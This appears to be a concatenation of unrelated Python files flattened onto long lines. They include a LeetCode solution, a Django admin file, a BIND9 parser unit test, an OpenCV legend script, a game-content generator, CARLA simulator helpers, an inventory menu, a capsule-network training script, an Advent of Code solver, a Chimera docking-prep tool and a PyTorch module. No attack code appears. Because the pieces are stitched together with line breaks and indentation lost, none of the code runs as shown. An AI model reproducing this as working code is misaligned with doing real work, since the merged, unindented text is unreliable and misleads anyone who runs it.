fig=plt.figure(figsize=(20,10)) plt.plot(testMat[:,1:]) plt.show() a = raw_input()
class Solution: def computeArea(self, A, B, C, D, E, F, G, H): if A < E: width = C - E if G >= C >= E else G - E if C >= G >= E else 0 else: width = G - A if C >= G >= A else C - A if G >= C >= A else 0 if B > F: height = H - B if D >= H >= B else D - B if H >= D >= B else 0 else: height = D - F if H >= D >= F else H - F if D >= H >= F else 0 return (D - B) * (C - A) + (H - F) * (G - E) - width * height
from django.contrib import admin from src.recipes.models import Recipe admin.site.register(Recipe)
#!/usr/bin/env python3 """ File: test_clause_managed_keys.py Description: Performs unit test on the isc_managed_keys.py source file. """ import unittest from bind9_parser.isc_utils import assertParserResultDictTrue, assertParserResultDictFalse from bind9_parser.isc_clause_managed_keys import clause_stmt_managed_keys_series class TestClauseManagedKeys(unittest.TestCase): """ Clause managed-keys """ def test_isc_clause_stmt_managed_keys_passing(self): """ Clause managed-keys; passing mode""" test_string = 'managed-keys { abc initial-key 1 2 3 "ASBASDASD==";};' expected_result = { 'managed_keys': [ { 'algorithm_id': 3, 'flags': 1, 'key_secret': '"ASBASDASD=="', 'protocol_id': 2, 'rr_domain': 'abc'}]} assertParserResultDictTrue(clause_stmt_managed_keys_series, test_string, expected_result) test_string = 'managed-keys { example.com initial-key 4 5 6 "ASBASDASD==";};' expected_result = { 'managed_keys': [ { 'algorithm_id': 6, 'flags': 4, 'key_secret': '"ASBASDASD=="', 'protocol_id': 5, 'rr_domain': 'example.com'}]} assertParserResultDictTrue(clause_stmt_managed_keys_series, test_string, expected_result) test_string = 'managed-keys { www.example.com initial-key 7 8 9 "ZZZZZZASD==";};' expected_result = { 'managed_keys': [ { 'algorithm_id': 9, 'flags': 7, 'key_secret': '"ZZZZZZASD=="', 'protocol_id': 8, 'rr_domain': 'www.example.com'}]} assertParserResultDictTrue(clause_stmt_managed_keys_series, test_string, expected_result) test_string = 'managed-keys { www1.www.example.com initial-key 1 1 1 "ASBASDASD==";};' expected_result = { 'managed_keys': [ { 'algorithm_id': 1, 'flags': 1, 'key_secret': '"ASBASDASD=="', 'protocol_id': 1, 'rr_domain': 'www1.www.example.com'}]} assertParserResultDictTrue(clause_stmt_managed_keys_series, test_string, expected_result) test_string = 'managed-keys { www1.www.example.com initial-key 1 1 1 "ASBASDASD==";};' expected_result = { 'managed_keys': [ { 'algorithm_id': 1, 'flags': 1, 'key_secret': '"ASBASDASD=="', 'protocol_id': 1, 'rr_domain': 'www1.www.example.com'}]} assertParserResultDictTrue(clause_stmt_managed_keys_series, test_string, expected_result) # Example extracted from https://docs.menandmice.com/display/MM/How+to+enable+DNSSEC+validation+in+a+resolving+BIND+DNS+Server test_string = """managed-keys { "." initial-key 257 3 8 "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq QxA+Uk1ihz0="; }; """ expected_result = { 'managed_keys': [ { 'algorithm_id': 8, 'flags': 257, 'key_secret': '"AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF\n' ' ' 'FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX\n' ' ' 'bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD\n' ' ' 'X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz\n' ' ' 'W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS\n' ' ' 'Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq\n' ' QxA+Uk1ihz0="', 'protocol_id': 3, 'rr_domain': '"."'}]} assertParserResultDictTrue(clause_stmt_managed_keys_series, test_string, expected_result) def test_isc_clause_stmt_managed_keys_failing(self): """ Clause managed-keys; purposely failing mode""" test_string = 'managed-keys { . initial-key 257 3 3 "AAAAAAAAA+BBBBBBBBBBBBB/CCXCCCCCCCCCCCCC";};' expected_result = {} assertParserResultDictFalse(clause_stmt_managed_keys_series, test_string, expected_result) if __name__ == '__main__': unittest.main()
__author__ = "Max Bachmann" __license__ = "MIT" __version__ = "1.0.2" from ._initialize import *
import json import numpy as np import cv2 def generate(): """Generate legend image from materials configuration.""" # load material file with open("materials.json", "r") as f: materials = json.load(f) # font setup fontFace = cv2.FONT_HERSHEY_SIMPLEX fontScale = 0.8 #0.4375 # as seen in bp_to_img > __create_images max_width = 0 max_height = 0 max_baseline = 0 for k in materials: # get size (width, height), baseline = cv2.getTextSize(k, fontFace, fontScale, 2) height += baseline max_width = max(max_width, width) max_height = max(max_height, height) max_baseline = max(max_baseline, baseline) # image setup front_space = 15 back_space = 10 top_space = 15 bottom_space = 15 background_color = np.array([255, 118, 33]) # "blueprint" blue img_size = (top_space + max(len(materials) - 1, 0) * 5 + len(materials) * max_height + bottom_space, front_space + max_height + 5 + max_width + back_space, 3) img = np.full(img_size, background_color, dtype=np.uint8) # image creation current_y = top_space text_loc_x = front_space + max_height + 5 text_loc_y = max_height - max_baseline for k in materials: # fill square with material color img[current_y:current_y+max_height, front_space:front_space+max_height] = materials[k]["Color"] # put text cv2.putText(img, k, (text_loc_x, current_y + text_loc_y), fontFace, fontScale, (255, 255, 255), 2) # next current_y += 5 + max_height # show / save cv2.imwrite("legend.png", img) if __name__ == "__main__": generate() exit()
from .fyve import Fyve
#!/usr/bin/env python3 # # corporation.py # SWN Corporation Generator # # Copyright (c) 2014 Steve Simenic <[email protected]> # # This file is part of the SWN Toolbox. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # import json import random import sys class Corporation: """ This class generates an corporation from tables/corporation.json, which has the following attributes: - name (string) - business (string) - reputation (string) """ def __init__(self): with open("tables/corporation.json", "r") as file: corporation = json.load(file) self.name = str(random.choice(corporation["name"])) self.business = str(random.choice(corporation["business"])) self.reputation = str(random.choice(corporation["reputation"])) def __str__(self): r = [ "Name: " + self.name, "Business: " + self.business, "Reputation: " + self.reputation ] return "\n".join(r) if __name__ == "__main__": try: times = int(sys.argv[1]) except: times = 1 for i in range(times): if i != 0: print("-----------+-+-+-----------") print(Corporation())
""" This file includes a number of helper functions for the main loop of the carla simulator. This includes printing measurements and steering.0 """ from carla import VehicleControl try: from pygame.locals import K_DOWN from pygame.locals import K_LEFT from pygame.locals import K_RIGHT from pygame.locals import K_SPACE from pygame.locals import K_UP from pygame.locals import K_a from pygame.locals import K_d from pygame.locals import K_p from pygame.locals import K_q from pygame.locals import K_r from pygame.locals import K_s from pygame.locals import K_w except ImportError: raise RuntimeError( 'cannot import pygame, make sure pygame package is installed') # Copyright (c) 2017 Computer Vision Center (CVC) at the Universitat Autonoma de # Barcelona (UAB). # # This work is licensed under the terms of the MIT license. # For a copy, see <https://opensource.org/licenses/MIT>. import datetime import sys from contextlib import contextmanager @contextmanager def make_connection(client_type, *args, **kwargs): """Context manager to create and connect a networking client object.""" client = None try: client = client_type(*args, **kwargs) client.connect() yield client finally: if client is not None: client.disconnect() class StopWatch(object): def __init__(self): self.start = datetime.datetime.now() self.end = None def restart(self): self.start = datetime.datetime.now() self.end = None def stop(self): self.end = datetime.datetime.now() def seconds(self): return (self.end - self.start).total_seconds() def milliseconds(self): return 1000.0 * self.seconds() def to_hex_str(header): return ':'.join('{:02x}'.format(ord(c)) for c in header) if sys.version_info >= (3, 3): import shutil def print_over_same_line(text): terminal_width = shutil.get_terminal_size((80, 20)).columns empty_space = max(0, terminal_width - len(text)) sys.stdout.write('\r' + text + empty_space * ' ') sys.stdout.flush() else: # Workaround for older Python versions. def print_over_same_line(text): line_length = max(print_over_same_line.last_line_length, len(text)) empty_space = max(0, line_length - len(text)) sys.stdout.write('\r' + text + empty_space * ' ') sys.stdout.flush() print_over_same_line.last_line_length = line_length print_over_same_line.last_line_length = 0 class KeyboardHelper: def get_keyboard_control(keys, is_on_reverse, enable_autopilot): if keys[K_r]: return None control = VehicleControl() if keys[K_LEFT] or keys[K_a]: control.steer = -1.0 if keys[K_RIGHT] or keys[K_d]: control.steer = 1.0 if keys[K_UP] or keys[K_w]: control.throttle = 1.0 if keys[K_DOWN] or keys[K_s]: control.brake = 1.0 if keys[K_SPACE]: control.hand_brake = True if keys[K_q]: is_on_reverse = not is_on_reverse if keys[K_p]: enable_autopilot = not enable_autopilot control.reverse = is_on_reverse return control, is_on_reverse, enable_autopilot class MeasurementsDisplayHelper: def print_player_measurements_map(player_measurements, map_position, lane_orientation, timer): message = 'Step {step} ({fps:.1f} FPS): ' message += 'Map Position ({map_x:.1f},{map_y:.1f}) ' message += 'Lane Orientation ({ori_x:.1f},{ori_y:.1f}) ' message += '{speed:.2f} km/h, ' message += '{other_lane:.0f}% other lane, {offroad:.0f}% off-road' message = message.format( map_x=map_position[0], map_y=map_position[1], ori_x=lane_orientation[0], ori_y=lane_orientation[1], step=timer.step, fps=timer.ticks_per_second(), speed=player_measurements.forward_speed * 3.6, other_lane=100 * player_measurements.intersection_otherlane, offroad=100 * player_measurements.intersection_offroad) print_over_same_line(message) def print_player_measurements(player_measurements, timer): message = 'Step {step} ({fps:.1f} FPS): ' message += '{speed:.2f} km/h, ' message += '{other_lane:.0f}% other lane, {offroad:.0f}% off-road' message = message.format( step=timer.step, fps=timer.ticks_per_second(), speed=player_measurements.forward_speed * 3.6, other_lane=100 * player_measurements.intersection_otherlane, offroad=100 * player_measurements.intersection_offroad) print_over_same_line(message)
if __name__ == "__main__": inventorydict = {} inventoryprice = {} itemgroup = {} while True: print('press 1 to create inventory items', '\npress 2 to delete items from inventory', '\npress 3 to view items in inventory', '\npress 4 to edit items in inventory', '\npress 5 to assign items to a group and view groups', '\npress 6 to quit') inp = input('Choose an option: ') if inp == '1': while True: inp1 = input('type items or type exit to quit: ').lower() if inp1 == 'exit': break inp2 = input('set price: ') if inp1 == 'exit' or inp2 == 'exit': break else: if inp1 not in inventorydict: inventorydict[inp1] = 1 inventoryprice[inp1] = inp2 else: inventorydict[inp1] += 1 inventoryprice[inp1] = inp2 if inp == '2': while True: inp3 = input('which item do you want to remove? or type exit to quit: ').lower() if inp3 == 'exit': break else: if inp3 in inventorydict: inventorydict.pop(inp3) inventoryprice.pop(inp3) itemgroup.pop(inp3) else: print('item is not in the inventory') if inp == '3': while True: inp4 = input('Do you want to view items? (Y/N) or type exit to quit: ').lower() if inp4 == 'exit' or inp4 == 'no': break if inp4 == 'y': for i in inventorydict and inventoryprice: print(f'item: {i}, quantity: {inventorydict[i]}, price per item: {inventoryprice[i]}') if inp == '4': while True: inp5 = input('Do you want to change price or quantity or group? (P/Q/G) or type exit to quit: ').lower() if inp5 == 'exit': break if inp5 == 'p': inp6 = input('give item name: ').lower() if inp6 in inventorydict: inp7 = input('set new price: ') inventoryprice[inp6] = inp7 else: inp8 = input('Item not in inventory. Would you like to add? (Y/N)').lower() if inp8 == 'n': break if inp8 == 'y': inp10 = input('item price: ') inventorydict[inp6] = 1 inventoryprice[inp6] = inp10 if inp5 == 'q': inp11 = input('give item name: ').lower() if inp11 in inventorydict: inp12 = input('set new quantity: ') inventorydict[inp11] = inp12 else: inp13 = input('Item not in inventory. Would you like to add? (Y/N)').lower() if inp13 == 'n': break if inp13 == 'y': inp14 = input('set new quantity: ') inp15 = input('set new price: ' ) inventorydict[inp11] = inp14 inventoryprice[inp11] = inp15 if inp5 == 'g': if len(itemgroup)==0: print('No groups available!') break else: while True: inp19 = input('type item name or exit to quit: ').lower() if inp19 == 'exit': break if inp19 not in itemgroup: print('This item does not have a group!') break inp20 = input('Do you want to assign or exit? (assign/exit) ').lower() if inp20 == 'assign': inp21 = input('set group name: ') inp22 = input('set quantity: ') inp23 = input('set price: ') inventorydict[inp19] = inp22 inventoryprice[inp19] = inp23 itemgroup[inp19] = inp21 if inp == '5': if len(inventorydict)==0 and len(inventoryprice)==0: print('You dont have any items in your inventory!') else: while True: inp16 = input('Do you wish to view item group or create new group? (view/create) or type exit to quit: ').lower() if inp16 == 'create': inp17 = input('type item name: ').lower() inp18 = input('type item group name: ').lower() itemgroup[inp17] = inp18 if inp16 == 'view' and len(itemgroup)==0: print('You dont have any groups!') break if inp16 == 'view': for i in itemgroup: print(f'item: {i}, quantity: {inventorydict[i]}, price per item: {inventoryprice[i]}, item group: {itemgroup[i]}') if inp16 =='exit': break if inp == '6': break
from shutil import copyfile import json import datetime import argparse import sys import os sys.path.append(os.path.abspath('../')) # SEEDS from numpy.random import seed seed(1234) from tensorflow import set_random_seed set_random_seed(1234) # CONFIG import config from config import path_output, path_logs, path_checkpoints, path_tests, path_predictions, h, w from config import monitor, mode, filename_save, save_best_only, use_multiprocessing, workers, max_queue_size, initial_epoch from config import batch_size, epochs, custom_callbacks, pretrain_config, load_weights_by_name, freeze_loaded_weights from config import steps_per_epoch, validation_steps, steps from config import optimizer, loss, metrics, loss_weights from config import do_pipeline_predictions, do_pipeline_hidden, shuffle_pred, steps_pred # UTILS from utils.callbacks import get_common_callbacks from utils.batch_generators import DatasetGenerator from utils.enums import Mode, Dataset, Feature # MODELS from models.conv_blocks import ApiConvBlocks, NO_CONV_BLOCK from models.caps_blocks import ApiCapsBlocks, ApiCapsBlocks_flatten, NO_CAPS_BLOCK, caps_block_get_group # DEEP import h5py import cv2 import numpy as np from keras import backend as K from keras.layers import Input from keras.models import Model K.set_image_data_format('channels_last') def build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs, path_model = None): # Load model from API Catalog outputs = ApiCapsBlocks[caps_block_group][caps_block_value](conv_block_value, mode_value, inputs) # Model definition model = Model(inputs, outputs, name = '__'.join([caps_block_group, caps_block_value, conv_block_value])) # If load weights if path_model is not None: # If string, make it list (as 'pretrain_config' is) if isinstance(path_model, str): path_model = [path_model] # Load all weights files for path_model_item in path_model: model.load_weights(path_model_item, by_name = load_weights_by_name) # Freeze loaded weights if freeze_loaded_weights: for name in [layer.name for layer in model.layers if layer.name in list(h5py.File(path_model_item, 'r').keys())]: model.get_layer(name).trainable = False # Compile the model model.compile(optimizer = optimizer, loss = loss, metrics = metrics, loss_weights = loss_weights) return model def train(caps_block_value, conv_block_value, feature_value): # Set Mode Value mode_value = Mode.train.value # Get capsule model group caps_block_group = caps_block_get_group(caps_block_value) # Config generators gen_train = DatasetGenerator(batch_size = batch_size, image_size = (h, w), shuffle = True, dataset_value = Dataset.train.value, steps_per_epoch = steps_per_epoch) gen_val = DatasetGenerator(batch_size = batch_size, image_size = (h, w), shuffle = True, dataset_value = Dataset.val.value) inputs = gen_train.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value) _ = gen_val.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value) # Subfolder experiment_id = datetime.datetime.now().strftime('%Y%m%d_%H_%M_%S') sub_folder = os.path.join(path_output, feature_value, conv_block_value, caps_block_value, experiment_id) # Callbacks callbacks = get_common_callbacks(sub_folder = sub_folder, path_logs = path_logs, path_checkpoints = path_checkpoints, monitor = monitor, mode = mode, filename_save = filename_save, save_best_only = save_best_only) + custom_callbacks # Copy config file to experiment folder copyfile(config.__file__, os.path.join(sub_folder, 'config_train.py')) # Model model = build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs, pretrain_config) model.summary() model.fit_generator(generator = gen_train, validation_data = gen_val, steps_per_epoch = steps_per_epoch, validation_steps = validation_steps, epochs = epochs, callbacks = callbacks, use_multiprocessing = use_multiprocessing, workers = workers, max_queue_size = max_queue_size, initial_epoch = initial_epoch) gen_train.save_trace_sampling(os.path.join(sub_folder, path_logs, 'trace_sampling.npy')) def test(caps_block_value, conv_block_value, feature_value, experiment_id): # Set Mode Value mode_value = Mode.test.value # Get capsule model group caps_block_group = caps_block_get_group(caps_block_value) # Config generator gen_test = DatasetGenerator(batch_size = 1, image_size = (h, w), shuffle = True, dataset_value = Dataset.test.value) inputs = gen_test.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value) # Subfolder sub_folder = os.path.join(path_output, feature_value, conv_block_value, caps_block_value, experiment_id) # Mkdir (with test_id) test_id = datetime.datetime.now().strftime('%Y%m%d_%H_%M_%S') path_tests_full = os.path.join(sub_folder, path_tests, test_id) if not os.path.exists(path_tests_full): os.makedirs(path_tests_full) # Copy config file to path_tests_full folder copyfile(config.__file__, os.path.join(path_tests_full, 'config_test.py')) # Model model = build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs) model.summary() # Loop over model weights (if multiple) path_model_filenames = sorted([item for item in os.listdir(os.path.join(sub_folder, path_checkpoints)) if item.endswith('.h5')]) for path_model_filename in path_model_filenames: # Model: load weights print('\n\nTEST CKPT: ' + path_model_filename + '\n\n') path_model = os.path.join(sub_folder, path_checkpoints, path_model_filename) model.load_weights(path_model, by_name = load_weights_by_name) # Scores scores = model.evaluate_generator(generator = gen_test, steps = steps, use_multiprocessing = use_multiprocessing, workers = workers, max_queue_size = max_queue_size, verbose = 1) # Save scores_filename = 'scores.json' if len(path_model_filenames) == 1 else 'scores-{}.json'.format(os.path.splitext(path_model_filename)[0]) with open(os.path.join(path_tests_full, scores_filename), 'w') as f: json.dump(dict(zip(model.metrics_names, list(scores))), f, indent = 4) def predict(caps_block_value, conv_block_value, feature_value, experiment_id, do_visual): # Set Mode Value mode_value = Mode.predict.value # Get capsule model group caps_block_group = caps_block_get_group(caps_block_value) # Config generator gen_predict = DatasetGenerator(batch_size = 1, image_size = (h, w), shuffle = shuffle_pred, dataset_value = Dataset.predict.value) inputs = gen_predict.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value) # Subfolder sub_folder = os.path.join(path_output, feature_value, conv_block_value, caps_block_value, experiment_id) # Mkdir (with prediction_id) prediction_id = datetime.datetime.now().strftime('%Y%m%d_%H_%M_%S') path_predictions_full = os.path.join(sub_folder, path_predictions, prediction_id) if not os.path.exists(path_predictions_full): os.makedirs(path_predictions_full) # Copy config file to path_predictions_full folder copyfile(config.__file__, os.path.join(path_predictions_full, 'config_predict.py')) # Model path_model = os.path.join(sub_folder, path_checkpoints, 'weights.h5') model = build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs, path_model = path_model) model.summary() # Build pipeline of predictions: predict, write results, etc. if do_pipeline_predictions: gen_predict.pipeline_predictions(model, path_predictions_full, do_visual, steps_pred) # Build pipeline of hidden representations: compute, write results, etc. if do_pipeline_hidden: gen_predict.pipeline_hidden(model, path_predictions_full) if __name__ == "__main__": # Parse args parser = argparse.ArgumentParser() parser.add_argument('--mode', '-m', help = 'Mode of execution', type = Mode, choices = list(Mode)) parser.add_argument('--feature', '-f', help = 'Feature from dataset', type = Feature, choices = list(Feature), default = Feature.all) parser.add_argument('--conv_block', help = 'ConvBlock model', type = str, choices = list(ApiConvBlocks), default = NO_CONV_BLOCK) parser.add_argument('--caps_block', help = 'CapsBlock model', type = str, choices = list(ApiCapsBlocks_flatten), default = NO_CAPS_BLOCK) parser.add_argument('--experiment_id', help = '[TEST/PREDICT] Experiment ID is defined as experiment folder name (provided as a date)', type = str) parser.add_argument('--do_visual', help = '[PREDICT] If used, save visual predictions along with metrics file', action = 'store_true') args = parser.parse_args() # Train if args.mode == Mode.train: train(args.caps_block, args.conv_block, args.feature.value) # Test if args.mode == Mode.test: test(args.caps_block, args.conv_block, args.feature.value, args.experiment_id) # Predict if args.mode == Mode.predict: predict(args.caps_block, args.conv_block, args.feature.value, args.experiment_id, args.do_visual)
import helpers def combine_mask(mask, i): p = 35 o = 0 m = 1 while p >= 0: v = i % 2 i = int(i/2) if (v == 1 and mask[p] == 'X') or mask[p] == '1': o += m m = m*2 p -= 1 return o def calc_sum(input): mem = {} for i in input: if 'mask' in i: mask = i.split(' = ')[1] elif 'mem' in i: v = int(i.split(' = ')[1]) a = int(i.split('mem[', 1)[1].split(']', 1)[0]) mem[a] = combine_mask(mask, v) s = 0 for m in mem: s += mem[m] return s def combine_mask2(mask, i): p = 35 base = 0 m = 1 xpos = [] while p >= 0: v = i % 2 i = int(i/2) if mask[p] == 'X': xpos.append(m) else: if v == 1 or mask[p] == '1': base += m m = m*2 p -= 1 memlocs = [] for a in range(0, pow(2, len(xpos))): p = 0 m = base d = a while d > 0: if (d % 2): m += xpos[p] p += 1 d = int(d/2) memlocs.append(m) return memlocs def calc_sum2(input): mem = {} for i in input: if 'mask' in i: mask = i.split(' = ')[1] elif 'mem' in i: v = int(i.split(' = ')[1]) a = int(i.split('mem[', 1)[1].split(']', 1)[0]) for m in combine_mask2(mask, a): mem[m] = v s = 0 for m in mem: s += mem[m] return s test_inp = helpers.read_file_as_array_str( './inputs_test_day14.txt') test_res = calc_sum(test_inp) if test_res != 165: print(f'algorithm part 1 not working...yet') exit() inp = helpers.read_file_as_array_str( './inputs_day14.txt') res = calc_sum(inp) print('part 1', res) test_inp2 = helpers.read_file_as_array_str( './inputs_test_day14b.txt') test_res2 = calc_sum2(test_inp2) if test_res2 != 208: print(f'algorithm part 1 not working...yet') exit() res = calc_sum2(inp) print('part 2', res)
#!/usr/bin/env python __author__="Thomas Evangelidis" __email__="[email protected]" import os from argparse import ArgumentParser, RawDescriptionHelpFormatter ## Parse command line arguments def cmdlineparse(): parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description=""" DESCRIPTION: This is a Python script to prepare the receptor-ligand complex for scoring. If you encounter problems with the input pdb file then try correcting it using: 1) pdb4amber from AmberTools (https://github.com/Amber-MD/pdb4amber) 2) pdbfixer (https://github.com/pandegroup/pdbfixer) TODO: add optional support for LYS and CYS protonated forms. https://www.cgl.ucsf.edu/chimera/docs/ContributedSoftware/addh/addh.html """, epilog=""" ### EXAMPLE 1: pychimera $(which dockprep.py) -complex 3K5C-BACE_150_complex.pdb -cmethod gas -neut """) parser.add_argument("-complex", dest="COMPLEX", required=False, default=None, type=str, help="pdb file with the holo form of the receptor.") parser.add_argument("-cmethod", dest="CHARGE_METHOD", required=False, default='gas', type=str, choices=['gas', 'am1'], help="Method to calculate charges fo the ligand. Default: %(default)s") parser.add_argument("-neut", dest="NEUTRALIZE", required=False, default=False, action='store_true', help="Neutralize the system by adding coutner ions.") parser.add_argument("-stripions", dest="STRIP_IONS", required=False, default=False, action='store_true', help="Strip out all ions.") parser.add_argument("-rec", dest="RECEPTOR", required=False, default=None, type=str, help="Instead of -complex give the pdb file with the apo form of the receptor.") parser.add_argument("-lig", dest="LIGAND", required=False, default=None, type=str, help="Instead of -complex give an sdf or mol2 file with optimized ligand structure from which to find the " "binding site residues.") args = parser.parse_args() return args if __name__ == "__main__": args = cmdlineparse() import chimera from chimera import runCommand as rc from Addions import initiateAddions from DockPrep import prep from AddCharge import estimateFormalCharge from chimera.selection import currentResidues if args.COMPLEX: rc("open %s" % args.COMPLEX) # load the protein-ligand complex if args.STRIP_IONS: rc("delete ions") rc("split #0 ligands") rc("sel #0.2") # select the ligand ligres = currentResidues()[0] ligres.type = 'LIG' # change the resname of the ligand to 'LIG' rc("combine #0.1 modelId 1") # create a new molecule containing just the receptor rc("combine #0.2 modelId 2") # create a new molecule containing just the ligand # Now that we calculated the charges of the protein and the ligand, we just need the complex rc("combine #1,2 modelId 3") # create a new molecule containing the protein-ligand complex rc("del #0-2") pdb = args.COMPLEX.replace(".pdb", "_prep.pdb") elif args.RECEPTOR and args.LIGAND: rc("open %s" % args.RECEPTOR) # load the receptor rc("open %s" % args.LIGAND) # load the ligand if args.STRIP_IONS: rc("delete ions") rc("sel #1") # select the ligand ligres = currentResidues()[0] ligres.type = 'LIG' # change the resname of the ligand to 'LIG' rc("combine #0,1 modelId 2") # create a new molecule containing the protein-ligand complex rc("combine #2 modelId 3") # create a new molecule containing the protein-ligand complex rc("del #0-2") pdb = os.path.splitext(os.path.basename(args.RECEPTOR))[0] + "_" + os.path.splitext(os.path.basename(args.LIGAND))[0] + "_prep.pdb" print("Preparing receptor for docking and calculating ligand '%s' charges (may be slow)." % args.CHARGE_METHOD) models = chimera.openModels.list(modelTypes=[chimera.Molecule]) prep(models, nogui=True, method=args.CHARGE_METHOD) net_charge = estimateFormalCharge(models[0].atoms) # Neutralize system if args.NEUTRALIZE: if net_charge < 0: initiateAddions(models, "Na+", "neutralize", chimera.replyobj.status) elif net_charge > 0: initiateAddions(models, "Cl-", "neutralize", chimera.replyobj.status) if net_charge != 0: # change the resids of the ions, which by default they are all 1 rc("sel ~ions") existing_resids = [int(str(r.id).split('.')[0]) for r in currentResidues()] start = max(existing_resids) + 2 rc("resrenumber %i ions" % start) # renumber the resids of the added ions # change the resid of the ligand rc('sel #3 & ~ #3:LIG') existing_resids = [int(str(r.id).split('.')[0]) for r in currentResidues()] start = max(existing_resids) + 2 rc("resrenumber %i #3:LIG" % start) rc("combine #3 modelId 4") # create a new molecule to split it into receptor and ligand rc("split #4 atoms ~#4:LIG") rc("combine #4.1 modelId 5") # create a new molecule containing just the receptor rc("combine #4.2 modelId 6") # create a new molecule containing just the ligand models = chimera.openModels.list(modelTypes=[chimera.Molecule]) # for m in models: print(len(m.atoms), estimateFormalCharge(m.atoms) # DEBUGGING rec_charge = estimateFormalCharge(models[3].atoms) lig_charge = estimateFormalCharge(models[4].atoms) rc("del #4-6") # Finally, write the complex pdb file with headers rc("changechains B A all") # <== OPTIONAL (ligand and protein will be chain A for homology modeling) rc("write format pdb #3 %s" % pdb) with open(pdb, "r+") as f: s = f.read() f.seek(0) f.write("# receptor net charge = %i\n# ligand net charge = %i\n" % (rec_charge, lig_charge)) # after system neutralization f.write(s)
import torch import torch.nn as nn import re class TaskCompositionBlockV1(nn.Module): """ This block takes the input features and conditions them with respect to the Task Palette embedding computed with the task representation block. """ def __init__(self, cfg_txt, in_channels, out_channels, dim_latent_w, ks, **kwargs): super().__init__() # Convolutional layer pd = ks // 2 self.conv1 = nn.Conv2d( in_channels=in_channels, out_channels=out_channels, kernel_size=ks, padding=pd ) # Spatial task conditioning self.spatial_cond = SpatialAffineCond( cfg_txt=cfg_txt, dim_latent_w=dim_latent_w, n_out_ch=out_channels ) # Activation - leaky relu self.act = nn.LeakyReLU() def forward(self, feature_map, latent_w_tensor, **kwargs): result = self.conv1(feature_map) result = self.spatial_cond( feature_map=result, latent_w_tensor=latent_w_tensor ) result = self.act(result) return result class SpatialAffineCond(nn.Module): """ Applies normalization with statitstics in a BatchNorm fashion followed with the affine transformation spatial task-wise encoding Implmenetation was taken over and modified from: https://github.com/NVlabs/SPADE/blob/master/models/networks/normalization.py """ def __init__(self, cfg_txt, dim_latent_w, n_out_ch): super().__init__() # Parse the configuration text that says which norm's # statistical normalization to use and which filter size # to use for computing the affine transformation parameters. assert cfg_txt.startswith('cond') parsed = re.search('cond_(\D+)(\d)x\d_hid(\d+)', cfg_txt) param_free_norm_type = str(parsed.group(1)) ks = int(parsed.group(2)) pw = ks // 2 n_hidden = int(parsed.group(3)) # Choose the appropriate parameter free normalization if param_free_norm_type == 'instance': self.param_free_norm = nn.InstanceNorm2d( num_features=n_out_ch, affine=False ) elif param_free_norm_type == 'batch': self.param_free_norm = nn.BatchNorm2d( num_features=n_out_ch, affine=False ) # elif param_free_norm_type == 'syncbatch': # self.param_free_norm = SynchronizedBatchNorm2d(norm_nc, affine=False) else: raise NotImplementedError # Computes intermediate embedding space self.conv_shared = nn.Sequential( nn.Conv2d( in_channels=dim_latent_w, out_channels=n_hidden, kernel_size=ks, padding=pw, bias=True ), nn.LeakyReLU() ) # Layers which apply the affine transformation conditioning self.affine_beta = torch.nn.Conv2d( in_channels=n_hidden, out_channels=n_out_ch, kernel_size=ks, stride=1, padding=pw, bias=True ) self.affine_gamma = torch.nn.Conv2d( in_channels=n_hidden, out_channels=n_out_ch, kernel_size=ks, stride=1, padding=pw, bias=True ) # Bias initialization self.affine_beta.bias.data[:] = 0 self.affine_gamma.bias.data[:] = 1 def forward(self, feature_map, latent_w_tensor): # Pass the latent code w map through a conv layer spat_w_code = self.conv_shared(latent_w_tensor) # Compute affine conditioning tensors # (conditioned on the task palette embedding map w) spat_gamma = self.affine_gamma(spat_w_code) spat_beta = self.affine_beta(spat_w_code) return self.param_free_norm(feature_map) * spat_gamma + spat_beta
